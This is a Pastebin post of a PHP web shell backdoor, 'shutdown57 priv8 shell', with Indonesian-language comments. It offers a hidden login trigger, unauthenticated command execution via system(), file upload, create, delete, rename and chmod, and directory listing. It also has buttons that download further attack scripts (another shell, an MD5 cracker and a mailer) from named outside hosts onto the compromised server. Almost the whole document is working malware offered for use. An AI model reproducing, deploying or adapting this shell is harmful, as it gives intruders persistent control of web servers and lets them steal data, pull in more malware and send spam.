Advertisement
alin_tamvanz

shutdown57 priv8 shell

Feb 23rd, 2016
333
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 7.74 KB | None | 0 0
  1. <?php
  2. //Script Kiddies EveryWhere :V
  3. #######################
  4. # Shell Backdoor      #
  5. # Mini simple shell   #
  6. # Author : shutdown57 #
  7. #######################
  8. //Semoga kau bukan script kiddies :'V
  9. echo'
  10. <style>
  11.  
  12. #cok{
  13. color:#fff;
  14. background:#fff;
  15. display:none;
  16. }
  17. </style>
  18. <div id="cok">
  19. <form method="request" >
  20. <input type="submit" value="_" name="root" >
  21. </form>
  22. </div>';
  23. if($_REQUEST['root']){
  24. #shutdown57--Priv8--backdoor
  25. @error_reporting(0);
  26. @set_time_limit(0);
  27. $judul = "root@shutdown57:~#";
  28. $user = $_REQUEST['root'];
  29. $tanggal = date('d > m > Y');
  30. $fn = $_SERVER['REQUEST_URI'];
  31. $doc_root = $_SERVER['DOCUMENT_ROOT'];
  32. $os = $_SERVER['HTTP_USER_AGENT'];
  33. $host = $_SERVER['HTTP_HOST'];
  34. echo'
  35.  
  36. <!DOCTYPE HTML>
  37. <html lang="en">
  38. <head>
  39. <meta name="viewport" content="width=width-device,initial-scale=1" >
  40. <meta name="keywords" content="shutdown57,alin57,57,[!]$hutdown57[!],shell,backdoor">
  41. <meta name="Author" content="shutdown57,alin57">
  42. <title> '.$judul.' </title>
  43. </head>
  44. <body>
  45. <pre><font color="#eee">
  46. ~#  shutdown57 Priv8 Shell   #~
  47. ================================
  48. |    c0ded By : shutdown57     |
  49. ================================
  50. </pre></font>
  51. <div align="center">
  52. <form method="post">
  53. <input type="submit" name="info" value="info" id="tombol">
  54. <input type="submit" name="upload" value="upload" id="tombol">
  55. <input type="submit" name="buatf" value="buat file" id="tombol">
  56. <input type="submit" name="hapusf" value="hapus file" id="tombol">
  57. <input type="submit" name="buatd" value="buat folder" id="tombol">
  58. <input type="submit" name="hapusd" value="hapus folder" id="tombol">
  59. <input type="submit" name="lihatf" value="lihat file" id="tombol">
  60. <input type="submit" name="ambil" value="import shell" id="tombol">
  61.  
  62. <input type="submit" name="ambil_md5" value="MD5 cracker" id="tombol">
  63.  
  64. <input type="submit" name="ambil_mailer" value="Mailer" id="tombol">
  65.  
  66.  
  67. <input type="submit" name="rename" value="Ganti Nama" id="tombol">
  68.  
  69. <input type="submit" name="chmod" value="chmod" id="tombol">
  70.  
  71. <input type="submit" name="command" value="terminal" id="tombol">
  72. <input type="submit" name="logout" value="keluar" id="tombol">
  73. </form>
  74. </div>
  75. <center>';
  76.  
  77. if($_POST['upload']){
  78. echo' <form action="" method="post" enctype="multipart/form-data">
  79. <input type="file" name="shutdown57"  id="text">
  80. <br>
  81. <input type="text" value="'.getcwd().'" name="fold" id="text">
  82. <br>
  83. <button type="submit" name="btn-upload" id="submit">Upload !</button>
  84. </form>';}
  85. if(isset($_POST['btn-upload']))
  86. {
  87.     $pic = $_FILES['shutdown57']['name'];
  88.     $pic_loc = $_FILES['shutdown57']['tmp_name'];
  89.     $akm = $_POST['fold'];
  90. $folder = "$akm/";  if(move_uploaded_file($pic_loc,$folder.$pic))
  91.     {
  92.         ?><script>alert('Berhasil Upload !');</script><?php
  93.     }
  94.     else
  95.     {
  96.         ?><script>alert('Gagal Upload\-,-/');</script><?php
  97.     }
  98. }
  99.  
  100. if($_POST['buatf']){
  101. echo'
  102. <form method="post">
  103. <textarea name="text">
  104. <!DOCTYPE HTML>
  105. <html lang="en">
  106. </textarea>
  107. <input type="text" value="'.getcwd().'/s57.html" name="nama_file" id="text">
  108. <input type="submit" value="simpan!" id="submit" name="save">';
  109. }elseif($_POST['save']){
  110. $text = $_POST['text'];
  111. $file = $_POST['nama_file'];
  112. $hendel = fopen(''.$file.'','a+');
  113. fwrite($hendel,"$text");
  114. fclose($hendel);
  115. echo' berhasil membuat file '.$file.'';
  116. }
  117.  
  118. if($_POST['hapusf']){
  119. echo'
  120. <form method="post">
  121. <input type="text" value="file.php" name="hf" id="text" >
  122. <br>
  123. <input type="submit" value="Hapus" id="submit" name="goo">
  124. </form>';}elseif($_POST['goo']){
  125. $file_hapus = $_POST['hf'];
  126. unlink($file_hapus);
  127. echo'Berhasil Menghapus '.$file_hapus.'';
  128. }
  129. if($_POST['buatd']){
  130. echo'<form method="post">
  131. <input type="text" value="folder" name="bd"id="text">
  132. <br>
  133. <input type="submit" value="buat" id="submit" name="buat_folder">
  134. </form>';}elseif($_POST['buat_folder']){
  135. $buat_dir = $_POST['bd'];
  136. mkdir($buat_dir);
  137. echo'berhasil buat folder '.$buat_dir.'';}
  138.  
  139. if($_POST['hapusd']){
  140. echo' <form method="post">
  141. <input type="text" value="folder" name="hd" id="text">
  142. <br>
  143. <input type="submit" value="Hapus" id="submit" name="hapus_folder">
  144. </form>';}elseif($_POST['hapus_folder']){
  145. $hd = $_POST['hd'];
  146. rmdir($hd);
  147. echo' berhasil menghapus '.$hd.'';}
  148. if($_POST['lihatf']){
  149. echo'<form method="post">
  150. <input type="text" value="'.$doc_root.'" name="scandir" id="text">
  151. <input type="submit" name="durn" value="Go!" id="submit"></form>';}elseif($_POST['durn']){
  152. $tar = $_POST['scandir'];
  153. $candir = scandir($tar);
  154. echo'<pre id="lf">';
  155. echo'====shutdown57====';
  156. print_r($candir);
  157. echo'</pre>';}
  158.  
  159. if($_POST['command']){
  160. echo' <form method="post">
  161. <input type="text" value="uname" name="prnth" id="text">
  162. <br>
  163. <input type="submit" id="submit" value="Run !" name="run">
  164. </form>';}elseif($_POST['run']){
  165. $comm = $_POST['prnth'];
  166. $runn = system($comm);
  167. echo'<pre>';
  168. print_r($runn);
  169. echo'</pre>';}
  170.  
  171. if($_POST['chmod']){
  172. echo' <form method="post">
  173. <input type="text" value="file.php" name="chm" id="text">
  174. <input type="text" value="755" name="mode" id="text">
  175. <br>
  176. <input type="submit" value="Chmod!" id="submit" name="cm">
  177. </form>';}elseif($_POST['cm']){
  178. $comh = $_POST['chm'];
  179. $mode = $_POST['mode'];
  180. chmod($comh,$mode);
  181. echo'Berhasil chmod '.$comh.'#'.$mode.'';}
  182. if($_POST['info']){
  183. echo' <pre id="lf">
  184. ++++++root@'.$user.':~#++++++++
  185. ================================
  186. ++ User    :'.$user.'
  187. ++ Date    : '.$tanggal.'
  188. ++ root    : '.getcwd().'
  189. ++ file    : '.$fn.'
  190. ++ Host    : '.$host.'
  191. </pre>
  192. ++ Browser : '.$os.'
  193. ';}
  194. if($_POST['logout']){
  195. header('location:?keluar='.$user.'');
  196. }
  197. if($_POST['rename']){
  198. echo'<form method="post">
  199. <input type="text" value="file.php" name="on" id="text">
  200. <input type="text" value="file_baru.php" name="nn" id="text">
  201. <br>
  202. <input type="submit" value="Rename!" id="submit" name="WwW">
  203. </form>';
  204. }elseif($_POST['WwW']){
  205. $old = $_POST['on'];
  206. $new = $_POST['nn'];
  207. rename($old,$new);
  208. echo' '.$old.' berhasil di ganti '.$new.'';
  209. }
  210.  
  211.  
  212. if($_POST['ambil']){
  213.  
  214. define('BUFSIZ', 4095);
  215. $url = 'http://kartinisoft.com/wp-content/uploads/2014/02/wos.php';
  216. $rfile = fopen($url, 'r');
  217. $lfile = fopen(basename($url), 'w');
  218. while(!feof($rfile))
  219. fwrite($lfile, fread($rfile, BUFSIZ), BUFSIZ);
  220. fclose($rfile);
  221. fclose($lfile);
  222. echo'wos.php telah di tambahkan ';}
  223.  
  224. if($_POST['ambil_md5']){
  225.  
  226. define('BUFSIZ', 4095);
  227. $url = 'http://alinko.pe.hu/upload/md5.php';
  228. $rfile = fopen($url, 'r');
  229. $lfile = fopen(basename($url), 'w');
  230. while(!feof($rfile))
  231. fwrite($lfile, fread($rfile, BUFSIZ), BUFSIZ);
  232. fclose($rfile);
  233. fclose($lfile);
  234. echo'md5.php telah di tambahkan ';}
  235. if($_POST['ambil_mailer']){
  236.  
  237. define('BUFSIZ', 4095);
  238. $url = 'http://alinko.pe.hu/upload/mailer.php';
  239. $rfile = fopen($url, 'r');
  240. $lfile = fopen(basename($url), 'w');
  241. while(!feof($rfile))
  242. fwrite($lfile, fread($rfile, BUFSIZ), BUFSIZ);
  243. fclose($rfile);
  244. fclose($lfile);
  245. echo'mailer.php telah di tambahkan ';}
  246.  
  247.  
  248. echo'
  249. <style>
  250. /**
  251. #Stylesheet
  252. #Coded By shutdown57
  253. #Kiddies Everywhere :V
  254. **/
  255. body{
  256. background:#000;
  257. color:#81ff00;
  258. }
  259. #tombol{
  260. color:#81ff00;
  261. background:#005d33;
  262. border-radius:5px;
  263. border:0;
  264. margin:2px;
  265. box-shadow:0px 0px 4px #eee;
  266. transform:rotate(5deg);
  267. -o-transform:rotate(5deg);
  268. -webkit-transform:rotate(5deg);
  269. -moz-transform:rotate(5deg);
  270. }
  271. #tombol:hover{
  272. background:#81ff00;
  273. color:#005d33;
  274. transform:rotate(-5deg);
  275. -o-transform:rotate(-5deg);
  276. -webkit-transform:rotate(-5deg);
  277. -moz-transform:rotate(-5deg);
  278. }
  279. #submit{
  280. color:#81ff00;
  281. background:#005d33;
  282. border-radius:5px;
  283. border:0;
  284. box-shadow:0px 0px 4px #eee;
  285. }
  286. #submit:hover{ background:#81ff00;
  287. color:#005d33;}
  288. #text{
  289. color:#000;
  290. background:#81ff00;
  291. width:70%;
  292. border:0;
  293. }
  294. #bla{
  295. background:#000;}
  296. textarea{
  297. width:70%;
  298. height:200px;
  299. color:#81ff00;
  300. background:#000;
  301. border:0;}
  302. #lf{
  303. text-align:left;
  304. }
  305. </style>';
  306. }
  307. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement